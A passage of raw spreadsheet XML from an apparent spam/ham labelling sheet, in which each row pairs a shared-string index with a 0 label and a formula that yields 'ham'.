        <v>0</v>
      </c>
      <c r="C2520" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2521" t="s">
        <v>1988</v>
      </c>
      <c r="B2521">
        <v>0</v>
      </c>
      <c r="C2521" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2522" t="s">
        <v>1989</v>
      </c>
      <c r="B2522">
        <v>0</v>
      </c>
      <c r="C2522" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2523" t="s">
        <v>1990</v>
      </c>
      <c r="B2523">
        <v>0</v>
      </c>
      <c r="C2523" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2524" t="s">
        <v>1991</v>
      </c>
      <c r="B2524">
        <v>0</v>
      </c>
      <c r="C2524" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2525" t="s">
        <v>1992</v>
      </c>
      <c r="B2525">
        <v>0</v>
      </c>
      <c r="C2525" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2526" t="s">
        <v>1993</v>
      </c>
      <c r="B2526">
        <v>0</v>
      </c>
      <c r="C2526" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2527" t="s">
        <v>1994</v>
      </c>
      <c r="B2527">
        <v>0</v>
      </c>
      <c r="C2527" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2528" t="s">
        <v>1995</v>
      </c>
      <c r="B2528">
        <v>0</v>
      </c>
      <c r="C2528" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2529" t="s">
        <v>1996</v>
      </c>
      <c r="B2529">
        <v>0</v>
      </c>
      <c r="C2529" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2530" t="s">
        <v>1997</v>
      </c>
      <c r="B2530">
        <v>0</v>
      </c>
      <c r="C2530" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2531" t="s">
        <v>1998</v>
      </c>
      <c r="B2531">
        <v>0</v>
      </c>
      <c r="C2531" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2532" t="s">
        <v>1999</v>
      </c>
      <c r="B2532">
        <v>0</v>
      </c>
      <c r="C2532" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2533" t="s">
        <v>2000</v>
      </c>
      <c r="B2533">
        <v>0</v>
      </c>
      <c r="C2533" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2534" t="s">
        <v>2001</v>
      </c>
      <c r="B2534">
        <v>0</v>
      </c>
      <c r="C2534" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2535" t="s">
        <v>2002</v>
      </c>
      <c r="B2535">
        <v>0</v>
      </c>
      <c r="C2535" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2536" t="s">
        <v>2003</v>
      </c>
      <c r="B2536">
        <v>0</v>
      </c>
      <c r="C2536" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2537" t="s">
        <v>2004</v>
      </c>
      <c r="B2537">
        <v>0</v>
      </c>
      <c r="C2537" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2538" t="s">
        <v>2005</v>
      </c>
      <c r="B2538">
        <v>0</v>
      </c>
      <c r="C2538" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2539" t="s">
        <v>2006</v>
      </c>
      <c r="B2539">
        <v>0</v>
      </c>
      <c r="C2539" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2540" t="s">
        <v>2007</v>
      </c>
      <c r="B2540">
        <v>0</v>
      </c>
      <c r="C2540" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2541" t="s">
        <v>2008</v>
      </c>
      <c r="B2541">
        <v>0</v>
      </c>
      <c r="C2541" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2542" t="s">
        <v>2009</v>
      </c>
      <c r="B2542">
        <v>0</v>
      </c>
      <c r="C2542" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2543" t="s">
        <v>2010</v>
      </c>
      <c r="B2543">
        <v>0</v>
      </c>
      <c r="C2543" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2544" t="s">
        <v>2011</v>
      </c>
      <c r="B2544">
        <v>0</v>
      </c>
      <c r="C2544" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2545" t="s">
        <v>2012</v>
      </c>
      <c r="B2545">
        <v>0</v>
      </c>
      <c r="C2545" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2546" t="s">
        <v>2013</v>
      </c>
      <c r="B2546">
        <v>0</v>
      </c>
      <c r="C2546" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2547" t="s">
        <v>2014</v>
      </c>
      <c r="B2547">
        <v>0</v>
      </c>
      <c r="C2547" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2548" t="s">
        <v>2015</v>
      </c>
      <c r="B2548">
        <v>0</v>
      </c>
      <c r="C2548" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2549" t="s">
        <v>2016</v>
      </c>
      <c r="B2549">
        <v>0</v>
      </c>
      <c r="C2549" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2550" t="s">
        <v>2017</v>
      </c>
      <c r="B2550">
        <v>0</v>
      </c>
      <c r="C2550" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2551" t="s">
        <v>2018</v>
      </c>
      <c r="B2551">
        <v>0</v>
      </c>
      <c r="C2551" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2552" t="s">
        <v>2019</v>
      </c>
      <c r="B2552">
        <v>0</v>
      </c>
      <c r="C2552" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2553" t="s">
        <v>2020</v>
      </c>
      <c r="B2553">
        <v>0</v>
      </c>
      <c r="C2553" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2554" t="s">
        <v>2021</v>
      </c>
      <c r="B2554">
        <v>0</v>
      </c>
      <c r="C2554" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2555" t="s">
        <v>2022</v>
      </c>
      <c r="B2555">
        <v>0</v>
      </c>
      <c r="C2555" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2556" t="s">
        <v>2023</v>
      </c>
      <c r="B2556">
        <v>0</v>
      </c>
      <c r="C2556" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2557" t="s">
        <v>2024</v>
      </c>
      <c r="B2557">
        <v>0</v>
      </c>
      <c r="C2557" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2558" t="s">
        <v>2025</v>
      </c>
      <c r="B2558">
        <v>0</v>
      </c>
      <c r="C2558" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2559" t="s">
        <v>2026</v>
      </c>
      <c r="B2559">
        <v>0</v>
      </c>
      <c r="C2559" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2560" t="s">
        <v>2027</v>
      </c>
      <c r="B2560">
        <v>0</v>
      </c>
      <c r="C2560" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2561" t="s">
        <v>2028</v>
      </c>
      <c r="B2561">
        <v>0</v>
      </c>
      <c r="C2561" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2562" t="s">
        <v>2029</v>
      </c>
      <c r="B2562">
        <v>0</v>
      </c>
      <c r="C2562" t="str">
        <f t="shared" ref="C2562:C2625" si="40">IF(B2562="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2563" t="s">
        <v>2030</v>
      </c>
      <c r="B2563">
        <v>0</v>
      </c>
      <c r="C2563" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2564" t="s">
        <v>2031</v>
      </c>
      <c r="B2564">
        <v>0</v>
      </c>
      <c r="C2564" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2565" t="s">
        <v>2032</v>
      </c>
      <c r="B2565">
        <v>0</v>
      </c>
      <c r="C2565" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2566" t="s">
        <v>2033</v>
      </c>
      <c r="B2566">
        <v>0</v>
      </c>
      <c r="C2566" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2567" t="s">
        <v>2034</v>
      </c>
      <c r="B2567">
        <v>0</v>
      </c>
      <c r="C2567" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2568" t="s">
        <v>2035</v>
      </c>
      <c r="B2568">
        <v>0</v>
      </c>
      <c r="C2568" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2569" t="s">
        <v>2036</v>
      </c>
      <c r="B2569">
        <v>0</v>
      </c>
      <c r="C2569" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2570" t="s">
        <v>2037</v>
      </c>
      <c r="B2570">
        <v>0</v>
      </c>
      <c r="C2570" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2571" t="s">
        <v>2038</v>
      </c>
      <c r="B2571">
        <v>0</v>
      </c>
      <c r="C2571" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2572" t="s">
        <v>2039</v>
      </c>
      <c r="B2572">
        <v>0</v>
      </c>
      <c r="C2572" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2573" t="s">
        <v>2040</v>
      </c>
      <c r="B2573">
        <v>0</v>
      </c>
      <c r="C2573" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2574" t="s">
        <v>2041</v>
      </c>
      <c r="B2574">
        <v>0</v>
      </c>
      <c r="C2574" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2575" t="s">
        <v>2042</v>
      </c>
      <c r="B2575">
        <v>0</v>
      </c>
      <c r="C2575" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2576" t="s">
        <v>2043</v>
      </c>
      <c r="B2576">
        <v>0</v>
      </c>
      <c r="C2576" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2577" t="s">
        <v>2044</v>
      </c>
      <c r="B2577">
        <v>0</v>
      </c>
      <c r="C2577" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2578" t="s">
        <v>2045</v>
      </c>
      <c r="B2578">
        <v>0</v>
      </c>
      <c r="C2578" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2579" t="s">
        <v>2046</v>
      </c>
      <c r="B2579">
        <v>0</v>
      </c>
      <c r="C2579" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2580" t="s">
        <v>2047</v>
      </c>
      <c r="B2580">
        <v>0</v>
      </c>
      <c r="C2580" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2581" t="s">
        <v>2048</v>
      </c>
      <c r="B2581">
        <v>0</v>
      </c>
      <c r="C2581" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2582" t="s">
        <v>2049</v>
      </c>
      <c r="B2582">
        <v>0</v>
      </c>
      <c r="C2582" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2583" t="s">
        <v>2050</v>
      </c>
      <c r="B2583">
        <v>0</v>
      </c>
      <c r="C2583" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2584" t="s">
        <v>2051</v>
      </c>
      <c r="B2584">
        <v>0</v>
      </c>
      <c r="C2584" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2585" t="s">
        <v>2052</v>
      </c>
      <c r="B2585">
        <v>0</v>
      </c>
      <c r="C2585" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2586" t="s">
        <v>2053</v>
      </c>
      <c r="B2586">
        <v>0</v>
      </c>
      <c r="C2586" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2587" t="s">
        <v>2054</v>
      </c>
      <c r="B2587">
        <v>0</v>
      </c>
      <c r="C2587" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2588" t="s">
        <v>2055</v>
      </c>
      <c r="B2588">
        <v>0</v>
      </c>
      <c r="C2588" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2589" t="s">
        <v>2056</v>
      </c>
      <c r="B2589">
        <v>0</v>
      </c>
      <c r="C2589" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2590" t="s">
        <v>2057</v>
      </c>
      <c r="B2590">
        <v>0</v>
      </c>
      <c r="C2590" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2591" t="s">
        <v>2058</v>
      </c>
      <c r="B2591">
        <v>0</v>
      </c>
      <c r="C2591" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2592" t="s">
        <v>2059</v>
      </c>
      <c r="B2592">
        <v>0</v>
      </c>
      <c r="C2592" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2593" t="s">
        <v>2060</v>
      </c>
      <c r="B2593">
        <v>0</v>
      </c>
      <c r="C2593" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2594" t="s">
        <v>2061</v>
      </c>
      <c r="B2594">
        <v>0</v>
      </c>
      <c r="C2594" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2595" t="s">
        <v>2062</v>
      </c>
      <c r="B2595">
        <v>0</v>
      </c>
      <c r="C2595" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2596" t="s">
        <v>2063</v>
      </c>
      <c r="B2596">
        <v>0</v>
      </c>
      <c r="C2596" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2597" t="s">
        <v>2064</v>
      </c>
      <c r="B2597">
        <v>0</v>
      </c>
      <c r="C2597" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2598" t="s">
        <v>2065</v>
      </c>
      <c r="B2598">
        <v>0</v>
      </c>
      <c r="C2598" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2599" t="s">
        <v>2066</v>
      </c>
      <c r="B2599">
        <v>0</v>
      </c>
      <c r="C2599" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2600" t="s">
        <v>2067</v>
      </c>
      <c r="B2600">
        <v>0</v>
      </c>
      <c r="C2600" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2601" t="s">
        <v>21</v>
      </c>
      <c r="B2601">
        <v>0</v>
      </c>
      <c r="C2601" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2602" t="s">
        <v>2068</v>
      </c>
      <c r="B2602">
        <v>0</v>
      </c>
      <c r="C2602" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2603" t="s">
        <v>2069</v>
      </c>
      <c r="B2603">
        <v>0</v>
      </c>
      <c r="C2603" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2604" t="s">
        <v>2070</v>
      </c>
      <c r="B2604">
        <v>0</v>
      </c>
      <c r="C2604" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2605" t="s">
        <v>2071</v>
      </c>
      <c r="B2605">
        <v>0</v>
      </c>
      <c r="C2605" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2606" t="s">
        <v>2072</v>
      </c>
      <c r="B2606">
        <v>0</v>
      </c>
      <c r="C2606" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2607" t="s">
        <v>2073</v>
      </c>
      <c r="B2607">
        <v>0</v>
      </c>
      <c r="C2607" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2608" t="s">
        <v>2074</v>
      </c>
      <c r="B2608">
        <v>0</v>
      </c>
      <c r="C2608" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2609" t="s">
        <v>2075</v>
      </c>
      <c r="B2609">
        <v>0</v>
      </c>
      <c r="C2609" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2610" t="s">
        <v>2076</v>
      </c>
      <c r="B2610">
        <v>0</v>
      </c>
      <c r="C2610" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2611" t="s">
        <v>2077</v>
      </c>
      <c r="B2611">
        <v>0</v>
      </c>
      <c r="C2611" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2612" t="s">
        <v>2078</v>
      </c>
      <c r="B2612">
        <v>0</v>
      </c>
      <c r="C2612" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2613" t="s">
        <v>2079</v>
      </c>
      <c r="B2613">
        <v>0</v>
      </c>
      <c r="C2613" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2614" t="s">
        <v>2080</v>
      </c>
      <c r="B2614">
        <v>0</v>
      </c>
      <c r="C2614" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2615" t="s">
        <v>2081</v>
      </c>
      <c r="B2615">
        <v>0</v>
      </c>
      <c r="C2615" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2616" t="s">
        <v>2082</v>
      </c>
      <c r="B2616">
        <v>0</v>
      </c>
      <c r="C2616" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2617" t="s">
        <v>2083</v>
      </c>
      <c r="B2617">
        <v>0</v>
      </c>
      <c r="C2617" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2618" t="s">
        <v>2084</v>
      </c>
      <c r="B2618">
        <v>0</v>
      </c>
      <c r="C2618" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2619" t="s">
        <v>2085</v>
      </c>
      <c r="B2619">
        <v>0</v>
      </c>
      <c r="C2619" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2620" t="s">
        <v>2086</v>
      </c>
      <c r="B2620">
        <v>0</v>
      </c>
      <c r="C2620" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2621" t="s">
        <v>2087</v>
      </c>
      <c r="B2621">
        <v>0</v>
      </c>
      <c r="C2621" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2622" t="s">
        <v>2088</v>
      </c>
      <c r="B2622">
        <v>0</v>
      </c>
      <c r="C2622" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2623" t="s">
        <v>2089</v>
      </c>
      <c r="B2623">
        <v>0</v>
      </c>
      <c r="C2623" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2624" t="s">
        <v>2090</v>
      </c>
      <c r="B2624">
        <v>0</v>
      </c>
      <c r="C2624" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2625" t="s">
        <v>2091</v>
      </c>
      <c r="B2625">
        <v>0</v>
      </c>
      <c r="C2625" t="str">
        <f t="shared" si="40"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2626" t="s">
        <v>2092</v>
      </c>
      <c r="B2626">
        <v>0</v>
      </c>
      <c r="C2626" t="str">
        <f t="shared" ref="C2626:C2689" si="41">IF(B2626="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2627" t="s">
        <v>2093</v>
      </c>
      <c r="B2627">
        <v>0</v>
      </c>
      <c r="C2627" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2628" t="s">
        <v>2094</v>
      </c>
      <c r="B2628">
        <v>0</v>
      </c>
      <c r="C2628" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2629" t="s">
        <v>2095</v>
      </c>
      <c r="B2629">
        <v>0</v>
      </c>
      <c r="C2629" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2630" t="s">
        <v>2096</v>
      </c>
      <c r="B2630">
        <v>0</v>
      </c>
      <c r="C2630" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2631" t="s">
        <v>2097</v>
      </c>
      <c r="B2631">
        <v>0</v>
      </c>
      <c r="C2631" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2632" t="s">
        <v>2098</v>
      </c>
      <c r="B2632">
        <v>0</v>
      </c>
      <c r="C2632" t="str">
        <f t="shared" si="41"/>
